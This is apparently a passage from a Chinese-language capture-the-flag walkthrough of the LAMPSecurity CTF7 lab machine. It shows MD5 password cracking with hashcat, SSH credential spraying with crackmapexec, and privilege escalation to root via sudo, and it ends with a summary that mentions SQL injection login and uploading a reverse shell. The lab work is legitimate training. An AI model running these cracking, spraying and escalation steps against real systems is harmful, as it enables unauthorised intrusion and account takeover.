# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
使用 hashcat 破解md5
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%
Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024
把密码的字符串清洗一下,存到一个文件里 password.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
尝试用户名和密码
一个个的尝试比较慢,使用工具更高效
工具 crackmapexec 在域渗透较多使用,这里只是简单使用
crackmapexec 的运行结果是这样,尝试使用 grep 显示 + 加号 存在的行,方便观察
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH 192.168.50.156 22 192.168.50.156 [*] SSH-2.0-OpenSSH_5.3
SSH 192.168.50.156 22 192.168.50.156 [-] brian:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] brian:my2cents
SSH 192.168.50.156 22 192.168.50.156 [-] john:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] alice:turtles77
SSH 192.168.50.156 22 192.168.50.156 [-] alice:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] leon:qwer1234
SSH 192.168.50.156 22 192.168.50.156 [-] leon:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:turtles77 Authentication failed.
使用 grep 让它变得容易观察
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+'
SSH 192.168.50.156 22 192.168.50.156 [+] brian:my2cents
SSH 192.168.50.156 22 192.168.50.156 [+] alice:turtles77
SSH 192.168.50.156 22 192.168.50.156 [+] leon:qwer1234
SSH 192.168.50.156 22 192.168.50.156 [+] julia:madrid
SSH 192.168.50.156 22 192.168.50.156 [+] michael:somepassword
SSH 192.168.50.156 22 192.168.50.156 [+] charles:chuck33
用户 brain 的权限是 all all,权限很高
mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents
[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for brian: my2cents
Matching Defaults entries for brian on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brian may run the following commands on this host:
(ALL) ALL
拿下 root
拿下 root
[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
inet6 fe80::20c:29ff:fe9d:12a9/64 scope link
valid_lft forever preferred_lft forever
[root@bogon inc]#
总结
主机扫描,我们比较感兴趣的端口有 80, 8080
爆一下 80 端口的目录,80 端口是一个 cms,爆破使用 dirb
8080是 cms 后台的页面,sql 注入万能密码登录进入
在后台传个反弹 shell,在爆破目录 asset 中找到 shell 的上传位置
kali 拿到 shell 后使用 python 升级 shell
继续在内网中收集信息,发现数据库连接的配置文件
使用 mysql 进入数据库,账号为 root,密码为空
在 website 数据库中找到 users 表,拿到账户名和密码哈希
使用 crackmap 做密码碰撞,使用用户 brain,sudo -l 查看当前账户的权限
使用 sudo /bin/bash 以管理员身份启动一个 bash 的进程,拿到 root 权限
结束